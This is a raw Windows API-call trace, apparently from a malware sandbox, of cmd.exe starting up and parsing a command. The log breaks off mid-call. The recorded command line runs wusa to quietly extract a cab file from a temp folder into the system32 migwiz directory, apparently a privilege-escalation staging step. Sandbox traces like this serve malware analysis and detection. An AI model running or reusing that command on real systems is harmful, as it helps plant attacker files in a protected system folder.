[0136.446] SetConsoleCtrlHandler (HandlerRoutine=0x4ab73184, Add=1) returned 1 [0136.446] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.446] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.446] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.446] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 1 [0136.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.447] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.447] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.447] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0136.447] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.447] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.447] GetEnvironmentStringsW () returned 0x398bc0* [0136.447] GetProcessHeap () returned 0x380000 [0136.447] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xa7c) returned 0x399650 [0136.448] FreeEnvironmentStringsW (penv=0x398bc0) returned 1 [0136.448] GetProcessHeap () returned 0x380000 [0136.448] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x8) returned 0x398a40 [0136.448] GetEnvironmentStringsW () returned 0x398bc0* [0136.448] GetProcessHeap () returned 0x380000 [0136.448] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xa7c) returned 0x39a0e0 [0136.448] FreeEnvironmentStringsW (penv=0x398bc0) returned 1 [0136.448] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e708 | out: phkResult=0x20e708*=0x44) returned 0x0 [0136.448] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x0, lpData=0x20e720*=0x18, lpcbData=0x20e704*=0x1000) returned 0x2 [0136.448] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x4, lpData=0x20e720*=0x1, lpcbData=0x20e704*=0x4) returned 0x0 [0136.448] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x0, lpData=0x20e720*=0x1, lpcbData=0x20e704*=0x1000) returned 0x2 [0136.448] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x4, lpData=0x20e720*=0x0, lpcbData=0x20e704*=0x4) returned 0x0 [0136.448] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x4, lpData=0x20e720*=0x40, lpcbData=0x20e704*=0x4) returned 0x0 [0136.448] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x4, lpData=0x20e720*=0x40, lpcbData=0x20e704*=0x4) returned 0x0 [0136.448] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x0, lpData=0x20e720*=0x40, lpcbData=0x20e704*=0x1000) returned 0x2 [0136.448] RegCloseKey (hKey=0x44) returned 0x0 [0136.448] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e708 | out: phkResult=0x20e708*=0x44) returned 0x0 [0136.448] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x0, lpData=0x20e720*=0x40, lpcbData=0x20e704*=0x1000) returned 0x2 [0136.448] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x4, lpData=0x20e720*=0x1, lpcbData=0x20e704*=0x4) returned 0x0 [0136.449] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x0, lpData=0x20e720*=0x1, lpcbData=0x20e704*=0x1000) returned 0x2 [0136.449] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x4, lpData=0x20e720*=0x0, lpcbData=0x20e704*=0x4) returned 0x0 [0136.449] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x4, lpData=0x20e720*=0x9, lpcbData=0x20e704*=0x4) returned 0x0 [0136.449] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x4, lpData=0x20e720*=0x9, lpcbData=0x20e704*=0x4) returned 0x0 [0136.449] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e700, lpData=0x20e720, lpcbData=0x20e704*=0x1000 | out: lpType=0x20e700*=0x0, lpData=0x20e720*=0x9, lpcbData=0x20e704*=0x1000) returned 0x2 [0136.449] RegCloseKey (hKey=0x44) returned 0x0 [0136.449] time (in: timer=0x0 | out: timer=0x0) returned 0x5cd9e890 [0136.449] srand (_Seed=0x5cd9e890) [0136.449] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c wusa C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\64.cab /quiet /extract:C:\\Windows\\system32\\migwiz\\ & exit" [0136.449] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c wusa C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\64.cab /quiet /extract:C:\\Windows\\system32\\migwiz\\ & exit" [0136.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0136.449] GetProcessHeap () returned 0x380000 [0136.449] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x218) returned 0x39ab70 [0136.449] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x39ab80, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.449] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.449] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.449] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.449] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.449] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.449] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.449] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.449] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.449] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.450] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.450] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.450] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.450] GetProcessHeap () returned 0x380000 [0136.450] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x399650 | out: hHeap=0x380000) returned 1 [0136.450] GetEnvironmentStringsW () returned 0x398bc0* [0136.450] GetProcessHeap () returned 0x380000 [0136.450] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xa94) returned 0x39ad90 [0136.450] FreeEnvironmentStringsW (penv=0x398bc0) returned 1 [0136.450] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.450] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.450] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.450] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.450] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.450] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.450] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.450] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.450] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.450] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.450] GetProcessHeap () returned 0x380000 [0136.450] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x5a) returned 0x39b830 [0136.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f510 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0136.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x20f510, lpFilePart=0x20f4f0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFilePart=0x20f4f0*="Temp") returned 0x24 [0136.450] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp")) returned 0x2010 [0136.450] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f220 | out: lpFindFileData=0x20f220*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x39b8a0 [0136.451] FindClose (in: hFindFile=0x39b8a0 | out: hFindFile=0x39b8a0) returned 1 [0136.451] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1", lpFindFileData=0x20f220 | out: lpFindFileData=0x20f220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x39b8a0 [0136.451] FindClose (in: hFindFile=0x39b8a0 | out: hFindFile=0x39b8a0) returned 1 [0136.451] _wcsnicmp (_String1="5P5NRG~1", _String2="5P5NRG~1", _MaxCount=0x8) returned 0 [0136.451] _wcsicmp (_String1="5p5NrGJn0jS HALPmcxz", _String2="5P5NRG~1") returned -20 [0136.451] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData", lpFindFileData=0x20f220 | out: lpFindFileData=0x20f220*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="AppData", cAlternateFileName="")) returned 0x39b8a0 [0136.452] FindClose (in: hFindFile=0x39b8a0 | out: hFindFile=0x39b8a0) returned 1 [0136.452] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local", lpFindFileData=0x20f220 | out: lpFindFileData=0x20f220*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Local", cAlternateFileName="")) returned 0x39b8a0 [0136.452] FindClose (in: hFindFile=0x39b8a0 | out: hFindFile=0x39b8a0) returned 1 [0136.452] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFindFileData=0x20f220 | out: lpFindFileData=0x20f220*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5a575f0, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x5a575f0, ftLastWriteTime.dwHighDateTime=0x1d509d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Temp", cAlternateFileName="")) returned 0x39b8a0 [0136.452] FindClose (in: hFindFile=0x39b8a0 | out: hFindFile=0x39b8a0) returned 1 [0136.452] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp")) returned 0x2010 [0136.452] SetCurrentDirectoryW (lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp")) returned 1 [0136.452] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0136.452] GetProcessHeap () returned 0x380000 [0136.452] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39ad90 | out: hHeap=0x380000) returned 1 [0136.452] GetEnvironmentStringsW () returned 0x39b8a0* [0136.452] GetProcessHeap () returned 0x380000 [0136.453] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xae6) returned 0x39c390 [0136.453] FreeEnvironmentStringsW (penv=0x39b8a0) returned 1 [0136.453] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0136.453] GetProcessHeap () returned 0x380000 [0136.453] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39b830 | out: hHeap=0x380000) returned 1 [0136.453] GetProcessHeap () returned 0x380000 [0136.453] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x4016) returned 0x39ce80 [0136.453] GetProcessHeap () returned 0x380000 [0136.453] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xdc) returned 0x3996b0 [0136.453] GetProcessHeap () returned 0x380000 [0136.453] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39ce80 | out: hHeap=0x380000) returned 1 [0136.453] GetConsoleOutputCP () returned 0x1b5 [0136.454] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0136.454] GetUserDefaultLCID () returned 0x409 [0136.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab87b50, cchData=8 | out: lpLCData=":") returned 2 [0136.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f620, cchData=128 | out: lpLCData="0") returned 2 [0136.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f620, cchData=128 | out: lpLCData="0") returned 2 [0136.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f620, cchData=128 | out: lpLCData="1") returned 2 [0136.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab9a740, cchData=8 | out: lpLCData="/") returned 2 [0136.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0136.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0136.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0136.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0136.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0136.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0136.455] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab87b40, cchData=8 | out: lpLCData=".") returned 2 [0136.455] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0136.455] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.456] GetProcessHeap () returned 0x380000 [0136.456] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x20c) returned 0x399810 [0136.456] GetConsoleTitleW (in: lpConsoleTitle=0x399810, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.456] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0136.456] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0136.456] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0136.456] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0136.457] GetProcessHeap () returned 0x380000 [0136.457] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x4012) returned 0x39ce80 [0136.457] GetProcessHeap () returned 0x380000 [0136.457] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39ce80 | out: hHeap=0x380000) returned 1 [0136.457] _wcsicmp (_String1="wusa", _String2=")") returned 78 [0136.457] _wcsicmp (_String1="FOR", _String2="wusa") returned -17 [0136.457] _wcsicmp (_String1="FOR/?", _String2="wusa") returned -17 [0136.457] _wcsicmp (_String1="IF", _String2="wusa") returned -14 [0136.457] _wcsicmp (_String1="IF/?", _String2="wusa") returned -14 [0136.457] _wcsicmp (_String1="REM", _String2="wusa") returned -5 [0136.457] _wcsicmp (_String1="REM/?", _String2="wusa") returned -5 [0136.457] GetProcessHeap () returned 0x380000 [0136.457] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xb0) returned 0x399a30 [0136.457] GetProcessHeap () returned 0x380000 [0136.457] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1a) returned 0x3946f0 [0136.459] GetProcessHeap () returned 0x380000 [0136.459] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xc4) returned 0x399af0 [0136.460] GetProcessHeap () returned 0x380000 [0136.460] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xb0) returned 0x399bc0 [0136.460] _wcsicmp (_String1="exit", _String2=")") returned 60 [0136.460] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0136.460] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0136.461] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0136.461] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0136.461] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0136.461] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0136.461] GetProcessHeap () returned 0x380000 [0136.461] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xb0) returned 0x399c80 [0136.461] GetProcessHeap () returned 0x380000 [0136.461] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1a) returned 0x394720 [0136.462] GetConsoleTitleW (in: lpConsoleTitle=0x20f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.462] _wcsicmp (_String1="wusa", _String2="DIR") returned 19 [0136.462] _wcsicmp (_String1="wusa", _String2="ERASE") returned 18 [0136.462] _wcsicmp (_String1="wusa", _String2="DEL") returned 19 [0136.462] _wcsicmp (_String1="wusa", _String2="TYPE") returned 3 [0136.462] _wcsicmp (_String1="wusa", _String2="COPY") returned 20 [0136.462] _wcsicmp (_String1="wusa", _String2="CD") returned 20 [0136.462] _wcsicmp (_String1="wusa", _String2="CHDIR") returned 20 [0136.462] _wcsicmp (_String1="wusa", _String2="RENAME") returned 5 [0136.462] _wcsicmp (_String1="wusa", _String2="REN") returned 5 [0136.463] _wcsicmp (_String1="wusa", _String2="ECHO") returned 18 [0136.463] _wcsicmp (_String1="wusa", _String2="SET") returned 4 [0136.463] _wcsicmp (_String1="wusa", _String2="PAUSE") returned 7 [0136.463] _wcsicmp (_String1="wusa", _String2="DATE") returned 19 [0136.463] _wcsicmp (_String1="wusa", _String2="TIME") returned 3 [0136.463] _wcsicmp (_String1="wusa", _String2="PROMPT") returned 7 [0136.463] _wcsicmp (_String1="wusa", _String2="MD") returned 10 [0136.463] _wcsicmp (_String1="wusa", _String2="MKDIR") returned 10 [0136.463] _wcsicmp (_String1="wusa", _String2="RD") returned 5 [0136.463] _wcsicmp (_String1="wusa", _String2="RMDIR") returned 5 [0136.463] _wcsicmp (_String1="wusa", _String2="PATH") returned 7 [0136.463] _wcsicmp (_String1="wusa", _String2="GOTO") returned 16 [0136.463] _wcsicmp (_String1="wusa", _String2="SHIFT") returned 4 [0136.463] _wcsicmp (_String1="wusa", _String2="CLS") returned 20 [0136.463] _wcsicmp (_String1="wusa", _String2="CALL") returned 20 [0136.463] _wcsicmp (_String1="wusa", _String2="VERIFY") returned 1 [0136.463] _wcsicmp (_String1="wusa", _String2="VER") returned 1 [0136.463] _wcsicmp (_String1="wusa", _String2="VOL") returned 1 [0136.463] _wcsicmp (_String1="wusa", _String2="EXIT") returned 18 [0136.463] _wcsicmp (_String1="wusa", _String2="SETLOCAL") returned 4 [0136.463] _wcsicmp (_String1="wusa", _String2="ENDLOCAL") returned 18 [0136.463] _wcsicmp (_String1="wusa", _String2="TITLE") returned 3 [0136.463] _wcsicmp (_String1="wusa", _String2="START") returned 4 [0136.463] _wcsicmp (_String1="wusa", _String2="DPATH") returned 19 [0136.463] _wcsicmp (_String1="wusa", _String2="KEYS") returned 12 [0136.463] _wcsicmp (_String1="wusa", _String2="MOVE") returned 10 [0136.463] _wcsicmp (_String1="wusa", _String2="PUSHD") returned 7 [0136.463] _wcsicmp (_String1="wusa", _String2="POPD") returned 7 [0136.463] _wcsicmp (_String1="wusa", _String2="ASSOC") returned 22 [0136.463] _wcsicmp (_String1="wusa", _String2="FTYPE") returned 17 [0136.463] _wcsicmp (_String1="wusa", _String2="BREAK") returned 21 [0136.463] _wcsicmp (_String1="wusa", _String2="COLOR") returned 20 [0136.463] _wcsicmp (_String1="wusa", _String2="MKLINK") returned 10 [0136.464] _wcsicmp (_String1="wusa", _String2="DIR") returned 19 [0136.464] _wcsicmp (_String1="wusa", _String2="ERASE") returned 18 [0136.464] _wcsicmp (_String1="wusa", _String2="DEL") returned 19 [0136.464] _wcsicmp (_String1="wusa", _String2="TYPE") returned 3 [0136.464] _wcsicmp (_String1="wusa", _String2="COPY") returned 20 [0136.464] _wcsicmp (_String1="wusa", _String2="CD") returned 20 [0136.464] _wcsicmp (_String1="wusa", _String2="CHDIR") returned 20 [0136.464] _wcsicmp (_String1="wusa", _String2="RENAME") returned 5 [0136.464] _wcsicmp (_String1="wusa", _String2="REN") returned 5 [0136.464] _wcsicmp (_String1="wusa", _String2="ECHO") returned 18 [0136.464] _wcsicmp (_String1="wusa", _String2="SET") returned 4 [0136.464] _wcsicmp (_String1="wusa", _String2="PAUSE") returned 7 [0136.464] _wcsicmp (_String1="wusa", _String2="DATE") returned 19 [0136.464] _wcsicmp (_String1="wusa", _String2="TIME") returned 3 [0136.464] _wcsicmp (_String1="wusa", _String2="PROMPT") returned 7 [0136.464] _wcsicmp (_String1="wusa", _String2="MD") returned 10 [0136.464] _wcsicmp (_String1="wusa", _String2="MKDIR") returned 10 [0136.464] _wcsicmp (_String1="wusa", _String2="RD") returned 5 [0136.464] _wcsicmp (_String1="wusa", _String2="RMDIR") returned 5 [0136.464] _wcsicmp (_String1="wusa", _String2="PATH") returned 7 [0136.464] _wcsicmp (_String1="wusa", _String2="GOTO") returned 16 [0136.464] _wcsicmp (_String1="wusa", _String2="SHIFT") returned 4 [0136.464] _wcsicmp (_String1="wusa", _String2="CLS") returned 20 [0136.464] _wcsicmp (_String1="wusa", _String2="CALL") returned 20 [0136.464] _wcsicmp (_String1="wusa", _String2="VERIFY") returned 1 [0136.464] _wcsicmp (_String1="wusa", _String2="VER") returned 1 [0136.464] _wcsicmp (_String1="wusa", _String2="VOL") returned 1 [0136.464] _wcsicmp (_String1="wusa", _String2="EXIT") returned 18 [0136.464] _wcsicmp (_String1="wusa", _String2="SETLOCAL") returned 4 [0136.464] _wcsicmp (_String1="wusa", _String2="ENDLOCAL") returned 18 [0136.464] _wcsicmp (_String1="wusa", _String2="TITLE") returned 3 [0136.464] _wcsicmp (_String1="wusa", _String2="START") returned 4 [0136.464] _wcsicmp (_String1="wusa", _String2="DPATH") returned 19 [0136.464] _wcsicmp (_String1="wusa", _String2="KEYS") returned 12 [0136.464] _wcsicmp (_String1="wusa", _String2="MOVE") returned 10 [0136.464] _wcsicmp (_String1="wusa", _String2="PUSHD") returned 7 [0136.465] _wcsicmp (_String1="wusa", _String2="POPD") returned 7 [0136.465] _wcsicmp (_String1="wusa", _String2="ASSOC") returned 22 [0136.465] _wcsicmp (_String1="wusa", _String2="FTYPE") returned 17 [0136.465] _wcsicmp (_String1="wusa", _String2="BREAK") returned 21 [0136.465] _wcsicmp (_String1="wusa", _String2="COLOR") returned 20 [0136.465] _wcsicmp (_String1="wusa", _String2="MKLINK") returned 10 [0136.465] _wcsicmp (_String1="wusa", _String2="FOR") returned 17 [0136.465] _wcsicmp (_String1="wusa", _String2="IF") returned 14 [0136.465] _wcsicmp (_String1="wusa", _String2="REM") returned 5 [0136.465] GetProcessHeap () returned 0x380000 [0136.465] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x218) returned 0x399d40 [0136.465] GetProcessHeap () returned 0x380000 [0136.465] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xce) returned 0x399f60 [0136.465] _wcsnicmp (_String1="wusa", _String2="cmd ", _MaxCount=0x4) returned 20 [0136.465] GetProcessHeap () returned 0x380000 [0136.465] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x420) returned 0x381320 [0136.465] SetErrorMode (uMode=0x0) returned 0x0 [0136.465] SetErrorMode (uMode=0x1) returned 0x0 [0136.465] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x381330, lpFilePart=0x20ed00 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFilePart=0x20ed00*="Temp") returned 0x24 [0136.465] SetErrorMode (uMode=0x0) returned 0x1 [0136.466] GetProcessHeap () returned 0x380000 [0136.466] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x381320, Size=0x64) returned 0x381320 [0136.466] GetProcessHeap () returned 0x380000 [0136.466] RtlSizeHeap 